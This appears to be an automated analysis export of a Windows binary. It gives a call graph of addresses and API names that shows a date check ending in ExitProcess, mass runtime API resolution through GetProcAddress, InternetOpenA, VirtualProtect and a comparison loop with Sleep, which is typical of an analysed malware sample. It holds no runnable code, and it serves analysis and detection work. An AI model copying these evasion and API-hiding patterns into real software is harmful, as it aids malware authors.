686b0c -> 686920 GetSystemTime -> 686820 -> 68698e -> 686998 sscanf -> 68a800 -> 6869aa SystemTimeToFileTime, SystemTimeToFileTime -> 6869ce -> 6869d8 ExitProcess, or 6869e0 -> 685b10 -> 68a740 lstrcpy -> 685b2e -> 68a820 lstrlen (repeated through 685b64, 685b74, 685b93, 685ba0, 685bad, 685bf9) -> 686430 -> 6726a0 -> 685cc3 -> 686430 lstrcpy -> 68a7a0 lstrcpy -> 68a9b0 and 68a8a0 lstrcpy (three rounds: 685d0a, 685d3a, 685d6a) -> 685d76 -> 68a740 lstrcpy -> 685d9e -> 687500 GetWindowsDirectoryA -> 68a7a0 lstrcpy -> 685db8 -> 674880 -> 685dbe -> 6817a0 -> 685dc6 -> 68a740 lstrcpy -> 671590 lstrcpy -> 675960 -> 681050 -> 685e0e -> 68a740 lstrcpy -> 671590 lstrcpy -> 675960 (34 API calls) -> 680d90 -> 685e57 -> 68a740 lstrcpy -> 671590 lstrcpy -> 675960 (34 API calls) -> 680f40 -> 685e9e -> 671590 lstrcpy (export truncated here)
13704 685eb5 13703->13704 14931 681a10 13704->14931 13706 685eba 13707 68a740 lstrcpy 13706->13707 13708 685ed6 13707->13708 15275 674fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13708->15275 13710 685edb 13711 671590 lstrcpy 13710->13711 13712 685f5b 13711->13712 15282 680740 13712->15282 13714 685f60 13715 68a740 lstrcpy 13714->13715 13716 685f86 13715->13716 13717 671590 lstrcpy 13716->13717 13718 685f9a 13717->13718 13719 675960 34 API calls 13718->13719 13720 685fa0 13719->13720 13814 6745d1 RtlAllocateHeap 13813->13814 13816 674621 VirtualProtect 13814->13816 13816->13462 13818->13549 13820 6710c2 codecvt 13819->13820 13821 6710fd 13820->13821 13822 6710e2 VirtualFree 13820->13822 13821->13579 13822->13821 13824 671233 GlobalMemoryStatusEx 13823->13824 13824->13582 13825->13606 13827 68a7c2 13826->13827 13828 68a7ec 13827->13828 13829 68a7da lstrcpy 13827->13829 13828->13611 13829->13828 13831 68a740 lstrcpy 13830->13831 13832 686833 13831->13832 13833 68a9b0 4 API calls 13832->13833 13834 686845 13833->13834 13835 68a8a0 lstrcpy 13834->13835 13836 68684e 13835->13836 13837 68a9b0 4 API calls 13836->13837 13838 686867 13837->13838 13839 68a8a0 lstrcpy 13838->13839 13840 686870 13839->13840 13841 68a9b0 4 API calls 13840->13841 13842 68688a 13841->13842 13843 68a8a0 lstrcpy 13842->13843 13844 686893 13843->13844 13845 68a9b0 4 API calls 13844->13845 13846 6868ac 13845->13846 13847 68a8a0 lstrcpy 13846->13847 13848 6868b5 13847->13848 13849 68a9b0 4 API calls 13848->13849 13850 6868cf 13849->13850 13851 68a8a0 lstrcpy 13850->13851 13852 6868d8 13851->13852 13853 68a9b0 4 API calls 13852->13853 13854 6868f3 13853->13854 13855 68a8a0 lstrcpy 13854->13855 13856 6868fc 13855->13856 13857 68a7a0 lstrcpy 13856->13857 13858 686910 13857->13858 13858->13618 13860 68a812 13859->13860 13860->13621 13862 68a83f 13861->13862 13863 685b54 13862->13863 13864 68a87b lstrcpy 13862->13864 13863->13631 13864->13863 13866 68a8a0 lstrcpy 13865->13866 13867 686443 13866->13867 
13868 68a8a0 lstrcpy 13867->13868 13869 686455 13868->13869 13870 68a8a0 lstrcpy 13869->13870 13871 686467 13870->13871 13872 68a8a0 lstrcpy 13871->13872 13873 685b86 13872->13873 13873->13637 13875 6745c0 2 API calls 13874->13875 13876 6726b4 13875->13876 13877 6745c0 2 API calls 13876->13877 13878 6726d7 13877->13878 13879 6745c0 2 API calls 13878->13879 13880 6726f0 13879->13880 13881 6745c0 2 API calls 13880->13881 13882 672709 13881->13882 13883 6745c0 2 API calls 13882->13883 13884 672736 13883->13884 13885 6745c0 2 API calls 13884->13885 13886 67274f 13885->13886 13887 6745c0 2 API calls 13886->13887 13888 672768 13887->13888 13889 6745c0 2 API calls 13888->13889 13890 672795 13889->13890 13891 6745c0 2 API calls 13890->13891 13892 6727ae 13891->13892 13893 6745c0 2 API calls 13892->13893 13894 6727c7 13893->13894 13895 6745c0 2 API calls 13894->13895 13896 6727e0 13895->13896 13897 6745c0 2 API calls 13896->13897 13898 6727f9 13897->13898 13899 6745c0 2 API calls 13898->13899 13900 672812 13899->13900 13901 6745c0 2 API calls 13900->13901 13902 67282b 13901->13902 13903 6745c0 2 API calls 13902->13903 13904 672844 13903->13904 13905 6745c0 2 API calls 13904->13905 13906 67285d 13905->13906 13907 6745c0 2 API calls 13906->13907 13908 672876 13907->13908 13909 6745c0 2 API calls 13908->13909 13910 67288f 13909->13910 13911 6745c0 2 API calls 13910->13911 13912 6728a8 13911->13912 13913 6745c0 2 API calls 13912->13913 13914 6728c1 13913->13914 13915 6745c0 2 API calls 13914->13915 13916 6728da 13915->13916 13917 6745c0 2 API calls 13916->13917 13918 6728f3 13917->13918 13919 6745c0 2 API calls 13918->13919 13920 67290c 13919->13920 13921 6745c0 2 API calls 13920->13921 13922 672925 13921->13922 13923 6745c0 2 API calls 13922->13923 13924 67293e 13923->13924 13925 6745c0 2 API calls 13924->13925 13926 672957 13925->13926 13927 6745c0 2 API calls 13926->13927 13928 672970 13927->13928 13929 6745c0 2 API calls 13928->13929 13930 672989 13929->13930 13931 6745c0 2 
API calls 13930->13931 13932 6729a2 13931->13932 13933 6745c0 2 API calls 13932->13933 13934 6729bb 13933->13934 13935 6745c0 2 API calls 13934->13935 13936 6729d4 13935->13936 13937 6745c0 2 API calls 13936->13937 13938 6729ed 13937->13938 13939 6745c0 2 API calls 13938->13939 13940 672a06 13939->13940 13941 6745c0 2 API calls 13940->13941 13942 672a1f 13941->13942 13943 6745c0 2 API calls 13942->13943 13944 672a38 13943->13944 13945 6745c0 2 API calls 13944->13945 13946 672a51 13945->13946 13947 6745c0 2 API calls 13946->13947 13948 672a6a 13947->13948 13949 6745c0 2 API calls 13948->13949 13950 672a83 13949->13950 13951 6745c0 2 API calls 13950->13951 13952 672a9c 13951->13952 13953 6745c0 2 API calls 13952->13953 13954 672ab5 13953->13954 13955 6745c0 2 API calls 13954->13955 13956 672ace 13955->13956 13957 6745c0 2 API calls 13956->13957 13958 672ae7 13957->13958 13959 6745c0 2 API calls 13958->13959 13960 672b00 13959->13960 13961 6745c0 2 API calls 13960->13961 13962 672b19 13961->13962 13963 6745c0 2 API calls 13962->13963 13964 672b32 13963->13964 13965 6745c0 2 API calls 13964->13965 13966 672b4b 13965->13966 13967 6745c0 2 API calls 13966->13967 13968 672b64 13967->13968 13969 6745c0 2 API calls 13968->13969 13970 672b7d 13969->13970 13971 6745c0 2 API calls 13970->13971 13972 672b96 13971->13972 13973 6745c0 2 API calls 13972->13973 13974 672baf 13973->13974 13975 6745c0 2 API calls 13974->13975 13976 672bc8 13975->13976 13977 6745c0 2 API calls 13976->13977 13978 672be1 13977->13978 13979 6745c0 2 API calls 13978->13979 13980 672bfa 13979->13980 13981 6745c0 2 API calls 13980->13981 13982 672c13 13981->13982 13983 6745c0 2 API calls 13982->13983 13984 672c2c 13983->13984 13985 6745c0 2 API calls 13984->13985 13986 672c45 13985->13986 13987 6745c0 2 API calls 13986->13987 13988 672c5e 13987->13988 13989 6745c0 2 API calls 13988->13989 13990 672c77 13989->13990 13991 6745c0 2 API calls 13990->13991 13992 672c90 13991->13992 13993 6745c0 2 API calls 
13992->13993 13994 672ca9 13993->13994 13995 6745c0 2 API calls 13994->13995 13996 672cc2 13995->13996 13997 6745c0 2 API calls 13996->13997 13998 672cdb 13997->13998 13999 6745c0 2 API calls 13998->13999 14000 672cf4 13999->14000 14001 6745c0 2 API calls 14000->14001 14002 672d0d 14001->14002 14003 6745c0 2 API calls 14002->14003 14004 672d26 14003->14004 14005 6745c0 2 API calls 14004->14005 14006 672d3f 14005->14006 14007 6745c0 2 API calls 14006->14007 14008 672d58 14007->14008 14009 6745c0 2 API calls 14008->14009 14010 672d71 14009->14010 14011 6745c0 2 API calls 14010->14011 14012 672d8a 14011->14012 14013 6745c0 2 API calls 14012->14013 14014 672da3 14013->14014 14015 6745c0 2 API calls 14014->14015 14016 672dbc 14015->14016 14017 6745c0 2 API calls 14016->14017 14018 672dd5 14017->14018 14019 6745c0 2 API calls 14018->14019 14020 672dee 14019->14020 14021 6745c0 2 API calls 14020->14021 14022 672e07 14021->14022 14023 6745c0 2 API calls 14022->14023 14024 672e20 14023->14024 14025 6745c0 2 API calls 14024->14025 14026 672e39 14025->14026 14027 6745c0 2 API calls 14026->14027 14028 672e52 14027->14028 14029 6745c0 2 API calls 14028->14029 14030 672e6b 14029->14030 14031 6745c0 2 API calls 14030->14031 14032 672e84 14031->14032 14033 6745c0 2 API calls 14032->14033 14034 672e9d 14033->14034 14035 6745c0 2 API calls 14034->14035 14036 672eb6 14035->14036 14037 6745c0 2 API calls 14036->14037 14038 672ecf 14037->14038 14039 6745c0 2 API calls 14038->14039 14040 672ee8 14039->14040 14041 6745c0 2 API calls 14040->14041 14042 672f01 14041->14042 14043 6745c0 2 API calls 14042->14043 14044 672f1a 14043->14044 14045 6745c0 2 API calls 14044->14045 14046 672f33 14045->14046 14047 6745c0 2 API calls 14046->14047 14048 672f4c 14047->14048 14049 6745c0 2 API calls 14048->14049 14050 672f65 14049->14050 14051 6745c0 2 API calls 14050->14051 14052 672f7e 14051->14052 14053 6745c0 2 API calls 14052->14053 14054 672f97 14053->14054 14055 6745c0 2 API calls 14054->14055 
14056 672fb0 14055->14056 14057 6745c0 2 API calls 14056->14057 14058 672fc9 14057->14058 14059 6745c0 2 API calls 14058->14059 14060 672fe2 14059->14060 14061 6745c0 2 API calls 14060->14061 14062 672ffb 14061->14062 14063 6745c0 2 API calls 14062->14063 14064 673014 14063->14064 14065 6745c0 2 API calls 14064->14065 14066 67302d 14065->14066 14067 6745c0 2 API calls 14066->14067 14068 673046 14067->14068 14069 6745c0 2 API calls 14068->14069 14070 67305f 14069->14070 14071 6745c0 2 API calls 14070->14071 14072 673078 14071->14072 14073 6745c0 2 API calls 14072->14073 14074 673091 14073->14074 14075 6745c0 2 API calls 14074->14075 14076 6730aa 14075->14076 14077 6745c0 2 API calls 14076->14077 14078 6730c3 14077->14078 14079 6745c0 2 API calls 14078->14079 14080 6730dc 14079->14080 14081 6745c0 2 API calls 14080->14081 14082 6730f5 14081->14082 14083 6745c0 2 API calls 14082->14083 14084 67310e 14083->14084 14085 6745c0 2 API calls 14084->14085 14086 673127 14085->14086 14087 6745c0 2 API calls 14086->14087 14088 673140 14087->14088 14089 6745c0 2 API calls 14088->14089 14090 673159 14089->14090 14091 6745c0 2 API calls 14090->14091 14092 673172 14091->14092 14093 6745c0 2 API calls 14092->14093 14094 67318b 14093->14094 14095 6745c0 2 API calls 14094->14095 14096 6731a4 14095->14096 14097 6745c0 2 API calls 14096->14097 14098 6731bd 14097->14098 14099 6745c0 2 API calls 14098->14099 14100 6731d6 14099->14100 14101 6745c0 2 API calls 14100->14101 14102 6731ef 14101->14102 14103 6745c0 2 API calls 14102->14103 14104 673208 14103->14104 14105 6745c0 2 API calls 14104->14105 14106 673221 14105->14106 14107 6745c0 2 API calls 14106->14107 14108 67323a 14107->14108 14109 6745c0 2 API calls 14108->14109 14110 673253 14109->14110 14111 6745c0 2 API calls 14110->14111 14112 67326c 14111->14112 14113 6745c0 2 API calls 14112->14113 14114 673285 14113->14114 14115 6745c0 2 API calls 14114->14115 14116 67329e 14115->14116 14117 6745c0 2 API calls 14116->14117 14118 6732b7 
14117->14118 14119 6745c0 2 API calls 14118->14119 14120 6732d0 14119->14120 14121 6745c0 2 API calls 14120->14121 14122 6732e9 14121->14122 14123 6745c0 2 API calls 14122->14123 14124 673302 14123->14124 14125 6745c0 2 API calls 14124->14125 14126 67331b 14125->14126 14127 6745c0 2 API calls 14126->14127 14128 673334 14127->14128 14129 6745c0 2 API calls 14128->14129 14130 67334d 14129->14130 14131 6745c0 2 API calls 14130->14131 14132 673366 14131->14132 14133 6745c0 2 API calls 14132->14133 14134 67337f 14133->14134 14135 6745c0 2 API calls 14134->14135 14136 673398 14135->14136 14137 6745c0 2 API calls 14136->14137 14138 6733b1 14137->14138 14139 6745c0 2 API calls 14138->14139 14140 6733ca 14139->14140 14141 6745c0 2 API calls 14140->14141 14142 6733e3 14141->14142 14143 6745c0 2 API calls 14142->14143 14144 6733fc 14143->14144 14145 6745c0 2 API calls 14144->14145 14146 673415 14145->14146 14147 6745c0 2 API calls 14146->14147 14148 67342e 14147->14148 14149 6745c0 2 API calls 14148->14149 14150 673447 14149->14150 14151 6745c0 2 API calls 14150->14151 14152 673460 14151->14152 14153 6745c0 2 API calls 14152->14153 14154 673479 14153->14154 14155 6745c0 2 API calls 14154->14155 14156 673492 14155->14156 14157 6745c0 2 API calls 14156->14157 14158 6734ab 14157->14158 14159 6745c0 2 API calls 14158->14159 14160 6734c4 14159->14160 14161 6745c0 2 API calls 14160->14161 14162 6734dd 14161->14162 14163 6745c0 2 API calls 14162->14163 14164 6734f6 14163->14164 14165 6745c0 2 API calls 14164->14165 14166 67350f 14165->14166 14167 6745c0 2 API calls 14166->14167 14168 673528 14167->14168 14169 6745c0 2 API calls 14168->14169 14170 673541 14169->14170 14171 6745c0 2 API calls 14170->14171 14172 67355a 14171->14172 14173 6745c0 2 API calls 14172->14173 14174 673573 14173->14174 14175 6745c0 2 API calls 14174->14175 14176 67358c 14175->14176 14177 6745c0 2 API calls 14176->14177 14178 6735a5 14177->14178 14179 6745c0 2 API calls 14178->14179 14180 6735be 14179->14180 
14181 6745c0 2 API calls 14180->14181 14182 6735d7 14181->14182 14183 6745c0 2 API calls 14182->14183 14184 6735f0 14183->14184 14185 6745c0 2 API calls 14184->14185 14186 673609 14185->14186 14187 6745c0 2 API calls 14186->14187 14188 673622 14187->14188 14189 6745c0 2 API calls 14188->14189 14190 67363b 14189->14190 14191 6745c0 2 API calls 14190->14191 14192 673654 14191->14192 14193 6745c0 2 API calls 14192->14193 14194 67366d 14193->14194 14195 6745c0 2 API calls 14194->14195 14196 673686 14195->14196 14197 6745c0 2 API calls 14196->14197 14198 67369f 14197->14198 14199 6745c0 2 API calls 14198->14199 14200 6736b8 14199->14200 14201 6745c0 2 API calls 14200->14201 14202 6736d1 14201->14202 14203 6745c0 2 API calls 14202->14203 14204 6736ea 14203->14204 14205 6745c0 2 API calls 14204->14205 14206 673703 14205->14206 14207 6745c0 2 API calls 14206->14207 14208 67371c 14207->14208 14209 6745c0 2 API calls 14208->14209 14210 673735 14209->14210 14211 6745c0 2 API calls 14210->14211 14212 67374e 14211->14212 14213 6745c0 2 API calls 14212->14213 14214 673767 14213->14214 14215 6745c0 2 API calls 14214->14215 14216 673780 14215->14216 14217 6745c0 2 API calls 14216->14217 14218 673799 14217->14218 14219 6745c0 2 API calls 14218->14219 14220 6737b2 14219->14220 14221 6745c0 2 API calls 14220->14221 14222 6737cb 14221->14222 14223 6745c0 2 API calls 14222->14223 14224 6737e4 14223->14224 14225 6745c0 2 API calls 14224->14225 14226 6737fd 14225->14226 14227 6745c0 2 API calls 14226->14227 14228 673816 14227->14228 14229 6745c0 2 API calls 14228->14229 14230 67382f 14229->14230 14231 6745c0 2 API calls 14230->14231 14232 673848 14231->14232 14233 6745c0 2 API calls 14232->14233 14234 673861 14233->14234 14235 6745c0 2 API calls 14234->14235 14236 67387a 14235->14236 14237 6745c0 2 API calls 14236->14237 14238 673893 14237->14238 14239 6745c0 2 API calls 14238->14239 14240 6738ac 14239->14240 14241 6745c0 2 API calls 14240->14241 14242 6738c5 14241->14242 14243 6745c0 2 
API calls 14242->14243 14244 6738de 14243->14244 14245 6745c0 2 API calls 14244->14245 14246 6738f7 14245->14246 14247 6745c0 2 API calls 14246->14247 14248 673910 14247->14248 14249 6745c0 2 API calls 14248->14249 14250 673929 14249->14250 14251 6745c0 2 API calls 14250->14251 14252 673942 14251->14252 14253 6745c0 2 API calls 14252->14253 14254 67395b 14253->14254 14255 6745c0 2 API calls 14254->14255 14256 673974 14255->14256 14257 6745c0 2 API calls 14256->14257 14258 67398d 14257->14258 14259 6745c0 2 API calls 14258->14259 14260 6739a6 14259->14260 14261 6745c0 2 API calls 14260->14261 14262 6739bf 14261->14262 14263 6745c0 2 API calls 14262->14263 14264 6739d8 14263->14264 14265 6745c0 2 API calls 14264->14265 14266 6739f1 14265->14266 14267 6745c0 2 API calls 14266->14267 14268 673a0a 14267->14268 14269 6745c0 2 API calls 14268->14269 14270 673a23 14269->14270 14271 6745c0 2 API calls 14270->14271 14272 673a3c 14271->14272 14273 6745c0 2 API calls 14272->14273 14274 673a55 14273->14274 14275 6745c0 2 API calls 14274->14275 14276 673a6e 14275->14276 14277 6745c0 2 API calls 14276->14277 14278 673a87 14277->14278 14279 6745c0 2 API calls 14278->14279 14280 673aa0 14279->14280 14281 6745c0 2 API calls 14280->14281 14282 673ab9 14281->14282 14283 6745c0 2 API calls 14282->14283 14284 673ad2 14283->14284 14285 6745c0 2 API calls 14284->14285 14286 673aeb 14285->14286 14287 6745c0 2 API calls 14286->14287 14288 673b04 14287->14288 14289 6745c0 2 API calls 14288->14289 14290 673b1d 14289->14290 14291 6745c0 2 API calls 14290->14291 14292 673b36 14291->14292 14293 6745c0 2 API calls 14292->14293 14294 673b4f 14293->14294 14295 6745c0 2 API calls 14294->14295 14296 673b68 14295->14296 14297 6745c0 2 API calls 14296->14297 14298 673b81 14297->14298 14299 6745c0 2 API calls 14298->14299 14300 673b9a 14299->14300 14301 6745c0 2 API calls 14300->14301 14302 673bb3 14301->14302 14303 6745c0 2 API calls 14302->14303 14304 673bcc 14303->14304 14305 6745c0 2 API calls 
14304->14305 14306 673be5 14305->14306 14307 6745c0 2 API calls 14306->14307 14308 673bfe 14307->14308 14309 6745c0 2 API calls 14308->14309 14310 673c17 14309->14310 14311 6745c0 2 API calls 14310->14311 14312 673c30 14311->14312 14313 6745c0 2 API calls 14312->14313 14314 673c49 14313->14314 14315 6745c0 2 API calls 14314->14315 14316 673c62 14315->14316 14317 6745c0 2 API calls 14316->14317 14318 673c7b 14317->14318 14319 6745c0 2 API calls 14318->14319 14320 673c94 14319->14320 14321 6745c0 2 API calls 14320->14321 14322 673cad 14321->14322 14323 6745c0 2 API calls 14322->14323 14324 673cc6 14323->14324 14325 6745c0 2 API calls 14324->14325 14326 673cdf 14325->14326 14327 6745c0 2 API calls 14326->14327 14328 673cf8 14327->14328 14329 6745c0 2 API calls 14328->14329 14330 673d11 14329->14330 14331 6745c0 2 API calls 14330->14331 14332 673d2a 14331->14332 14333 6745c0 2 API calls 14332->14333 14334 673d43 14333->14334 14335 6745c0 2 API calls 14334->14335 14336 673d5c 14335->14336 14337 6745c0 2 API calls 14336->14337 14338 673d75 14337->14338 14339 6745c0 2 API calls 14338->14339 14340 673d8e 14339->14340 14341 6745c0 2 API calls 14340->14341 14342 673da7 14341->14342 14343 6745c0 2 API calls 14342->14343 14344 673dc0 14343->14344 14345 6745c0 2 API calls 14344->14345 14346 673dd9 14345->14346 14347 6745c0 2 API calls 14346->14347 14348 673df2 14347->14348 14349 6745c0 2 API calls 14348->14349 14350 673e0b 14349->14350 14351 6745c0 2 API calls 14350->14351 14352 673e24 14351->14352 14353 6745c0 2 API calls 14352->14353 14354 673e3d 14353->14354 14355 6745c0 2 API calls 14354->14355 14356 673e56 14355->14356 14357 6745c0 2 API calls 14356->14357 14358 673e6f 14357->14358 14359 6745c0 2 API calls 14358->14359 14360 673e88 14359->14360 14361 6745c0 2 API calls 14360->14361 14362 673ea1 14361->14362 14363 6745c0 2 API calls 14362->14363 14364 673eba 14363->14364 14365 6745c0 2 API calls 14364->14365 14366 673ed3 14365->14366 14367 6745c0 2 API calls 14366->14367 
14368 673eec 14367->14368 14369 6745c0 2 API calls 14368->14369 14370 673f05 14369->14370 14371 6745c0 2 API calls 14370->14371 14372 673f1e 14371->14372 14373 6745c0 2 API calls 14372->14373 14374 673f37 14373->14374 14375 6745c0 2 API calls 14374->14375 14376 673f50 14375->14376 14377 6745c0 2 API calls 14376->14377 14378 673f69 14377->14378 14379 6745c0 2 API calls 14378->14379 14380 673f82 14379->14380 14381 6745c0 2 API calls 14380->14381 14382 673f9b 14381->14382 14383 6745c0 2 API calls 14382->14383 14384 673fb4 14383->14384 14385 6745c0 2 API calls 14384->14385 14386 673fcd 14385->14386 14387 6745c0 2 API calls 14386->14387 14388 673fe6 14387->14388 14389 6745c0 2 API calls 14388->14389 14390 673fff 14389->14390 14391 6745c0 2 API calls 14390->14391 14392 674018 14391->14392 14393 6745c0 2 API calls 14392->14393 14394 674031 14393->14394 14395 6745c0 2 API calls 14394->14395 14396 67404a 14395->14396 14397 6745c0 2 API calls 14396->14397 14398 674063 14397->14398 14399 6745c0 2 API calls 14398->14399 14400 67407c 14399->14400 14401 6745c0 2 API calls 14400->14401 14402 674095 14401->14402 14403 6745c0 2 API calls 14402->14403 14404 6740ae 14403->14404 14405 6745c0 2 API calls 14404->14405 14406 6740c7 14405->14406 14407 6745c0 2 API calls 14406->14407 14408 6740e0 14407->14408 14409 6745c0 2 API calls 14408->14409 14410 6740f9 14409->14410 14411 6745c0 2 API calls 14410->14411 14412 674112 14411->14412 14413 6745c0 2 API calls 14412->14413 14414 67412b 14413->14414 14415 6745c0 2 API calls 14414->14415 14416 674144 14415->14416 14417 6745c0 2 API calls 14416->14417 14418 67415d 14417->14418 14419 6745c0 2 API calls 14418->14419 14420 674176 14419->14420 14421 6745c0 2 API calls 14420->14421 14422 67418f 14421->14422 14423 6745c0 2 API calls 14422->14423 14424 6741a8 14423->14424 14425 6745c0 2 API calls 14424->14425 14426 6741c1 14425->14426 14427 6745c0 2 API calls 14426->14427 14428 6741da 14427->14428 14429 6745c0 2 API calls 14428->14429 14430 6741f3 
14429->14430 14431 6745c0 2 API calls 14430->14431 14432 67420c 14431->14432 14433 6745c0 2 API calls 14432->14433 14434 674225 14433->14434 14435 6745c0 2 API calls 14434->14435 14436 67423e 14435->14436 14437 6745c0 2 API calls 14436->14437 14438 674257 14437->14438 14439 6745c0 2 API calls 14438->14439 14440 674270 14439->14440 14441 6745c0 2 API calls 14440->14441 14442 674289 14441->14442 14443 6745c0 2 API calls 14442->14443 14444 6742a2 14443->14444 14445 6745c0 2 API calls 14444->14445 14446 6742bb 14445->14446 14447 6745c0 2 API calls 14446->14447 14448 6742d4 14447->14448 14449 6745c0 2 API calls 14448->14449 14450 6742ed 14449->14450 14451 6745c0 2 API calls 14450->14451 14452 674306 14451->14452 14453 6745c0 2 API calls 14452->14453 14454 67431f 14453->14454 14455 6745c0 2 API calls 14454->14455 14456 674338 14455->14456 14457 6745c0 2 API calls 14456->14457 14458 674351 14457->14458 14459 6745c0 2 API calls 14458->14459 14460 67436a 14459->14460 14461 6745c0 2 API calls 14460->14461 14462 674383 14461->14462 14463 6745c0 2 API calls 14462->14463 14464 67439c 14463->14464 14465 6745c0 2 API calls 14464->14465 14466 6743b5 14465->14466 14467 6745c0 2 API calls 14466->14467 14468 6743ce 14467->14468 14469 6745c0 2 API calls 14468->14469 14470 6743e7 14469->14470 14471 6745c0 2 API calls 14470->14471 14472 674400 14471->14472 14473 6745c0 2 API calls 14472->14473 14474 674419 14473->14474 14475 6745c0 2 API calls 14474->14475 14476 674432 14475->14476 14477 6745c0 2 API calls 14476->14477 14478 67444b 14477->14478 14479 6745c0 2 API calls 14478->14479 14480 674464 14479->14480 14481 6745c0 2 API calls 14480->14481 14482 67447d 14481->14482 14483 6745c0 2 API calls 14482->14483 14484 674496 14483->14484 14485 6745c0 2 API calls 14484->14485 14486 6744af 14485->14486 14487 6745c0 2 API calls 14486->14487 14488 6744c8 14487->14488 14489 6745c0 2 API calls 14488->14489 14490 6744e1 14489->14490 14491 6745c0 2 API calls 14490->14491 14492 6744fa 14491->14492 
14493 6745c0 2 API calls 14492->14493 14494 674513 14493->14494 14495 6745c0 2 API calls 14494->14495 14496 67452c 14495->14496 14497 6745c0 2 API calls 14496->14497 14498 674545 14497->14498 14499 6745c0 2 API calls 14498->14499 14500 67455e 14499->14500 14501 6745c0 2 API calls 14500->14501 14502 674577 14501->14502 14503 6745c0 2 API calls 14502->14503 14504 674590 14503->14504 14505 6745c0 2 API calls 14504->14505 14506 6745a9 14505->14506 14507 689c10 14506->14507 14508 689c20 43 API calls 14507->14508 14509 68a036 8 API calls 14507->14509 14508->14509 14510 68a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14509->14510 14511 68a146 14509->14511 14510->14511 14512 68a153 8 API calls 14511->14512 14513 68a216 14511->14513 14512->14513 14514 68a298 14513->14514 14515 68a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14513->14515 14516 68a2a5 6 API calls 14514->14516 14517 68a337 14514->14517 14515->14514 14516->14517 14518 68a41f 14517->14518 14519 68a344 9 API calls 14517->14519 14520 68a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14518->14520 14521 68a4a2 14518->14521 14519->14518 14520->14521 14522 68a4ab GetProcAddress GetProcAddress 14521->14522 14523 68a4dc 14521->14523 14522->14523 14524 68a515 14523->14524 14525 68a4e5 GetProcAddress GetProcAddress 14523->14525 14526 68a612 14524->14526 14527 68a522 10 API calls 14524->14527 14525->14524 14528 68a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14526->14528 14529 68a67d 14526->14529 14527->14526 14528->14529 14530 68a69e 14529->14530 14531 68a686 GetProcAddress 14529->14531 14532 685ca3 14530->14532 14533 68a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14530->14533 14531->14530 14534 671590 14532->14534 14533->14532 15653 671670 14534->15653 14537 68a7a0 lstrcpy 14538 6715b5 14537->14538 14539 68a7a0 lstrcpy 14538->14539 14540 6715c7 14539->14540 14541 68a7a0 lstrcpy 
14540->14541 14542 6715d9 14541->14542 14543 68a7a0 lstrcpy 14542->14543 14544 671663 14543->14544 14545 685510 14544->14545 14546 685521 14545->14546 14547 68a820 2 API calls 14546->14547 14548 68552e 14547->14548 14549 68a820 2 API calls 14548->14549 14550 68553b 14549->14550 14551 68a820 2 API calls 14550->14551 14552 685548 14551->14552 14553 68a740 lstrcpy 14552->14553 14554 685555 14553->14554 14555 68a740 lstrcpy 14554->14555 14556 685562 14555->14556 14557 68a740 lstrcpy 14556->14557 14558 68556f 14557->14558 14559 68a740 lstrcpy 14558->14559 14597 68557c 14559->14597 14560 6852c0 25 API calls 14560->14597 14561 6851f0 20 API calls 14561->14597 14562 685643 StrCmpCA 14562->14597 14563 6856a0 StrCmpCA 14564 6857dc 14563->14564 14563->14597 14565 68a8a0 lstrcpy 14564->14565 14566 6857e8 14565->14566 14568 68a820 2 API calls 14566->14568 14567 68a820 lstrlen lstrcpy 14567->14597 14569 6857f6 14568->14569 14572 68a820 2 API calls 14569->14572 14570 685856 StrCmpCA 14571 685991 14570->14571 14570->14597 14573 68a8a0 lstrcpy 14571->14573 14574 685805 14572->14574 14575 68599d 14573->14575 14576 671670 lstrcpy 14574->14576 14577 68a820 2 API calls 14575->14577 14596 685811 14576->14596 14579 6859ab 14577->14579 14578 685a0b StrCmpCA 14580 685a28 14578->14580 14581 685a16 Sleep 14578->14581 14583 68a820 2 API calls 14579->14583 14584 68a8a0 lstrcpy 14580->14584 14581->14597 14582 68a740 lstrcpy 14582->14597 14585 6859ba 14583->14585 14587 685a34 14584->14587 14586 671670 lstrcpy 14585->14586 14586->14596 14588 68a820 2 API calls 14587->14588 14589 685a43 14588->14589 14590 68a820 2 API calls 14589->14590 14591 685a52 14590->14591 14593 671670 lstrcpy 14591->14593 14592 68578a StrCmpCA 14592->14597 14593->14596 14594 671590 lstrcpy 14594->14597 14595 68593f StrCmpCA 14595->14597 14596->13652 14597->14560 14597->14561 14597->14562 14597->14563 14597->14567 14597->14570 14597->14578 14597->14582 14597->14592 14597->14594 14597->14595 14598 68a7a0 lstrcpy 14597->14598 

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 689860-689874 call 689750 663 68987a-689a8e call 689780 GetProcAddress * 21 660->663 664 689a93-689af2 LoadLibraryA * 5 660->664 663->664 666 689b0d-689b14 664->666 667 689af4-689b08 GetProcAddress 664->667 669 689b46-689b4d 666->669 670 689b16-689b41 GetProcAddress * 2 666->670 667->666 671 689b68-689b6f 669->671 672 689b4f-689b63 GetProcAddress 669->672 670->669 673 689b89-689b90 671->673 674 689b71-689b84 GetProcAddress 671->674 672->671 675 689bc1-689bc2 673->675 676 689b92-689bbc GetProcAddress * 2 673->676 674->673 676->675
                            APIs
                            • GetProcAddress.KERNEL32(77190000,012B1630), ref: 006898A1
                            • GetProcAddress.KERNEL32(77190000,012B15E8), ref: 006898BA
                            • GetProcAddress.KERNEL32(77190000,012B1648), ref: 006898D2
                            • GetProcAddress.KERNEL32(77190000,012B1678), ref: 006898EA
                            • GetProcAddress.KERNEL32(77190000,012B1528), ref: 00689903
                            • GetProcAddress.KERNEL32(77190000,012B8A68), ref: 0068991B
                            • GetProcAddress.KERNEL32(77190000,012A5588), ref: 00689933
                            • GetProcAddress.KERNEL32(77190000,012A54C8), ref: 0068994C
                            • GetProcAddress.KERNEL32(77190000,012B1690), ref: 00689964
                            • GetProcAddress.KERNEL32(77190000,012B16A8), ref: 0068997C
                            • GetProcAddress.KERNEL32(77190000,012B17C8), ref: 00689995
                            • GetProcAddress.KERNEL32(77190000,012B16D8), ref: 006899AD
                            • GetProcAddress.KERNEL32(77190000,012A56A8), ref: 006899C5
                            • GetProcAddress.KERNEL32(77190000,012B16F0), ref: 006899DE
                            • GetProcAddress.KERNEL32(77190000,012B17E0), ref: 006899F6
                            • GetProcAddress.KERNEL32(77190000,012A53E8), ref: 00689A0E
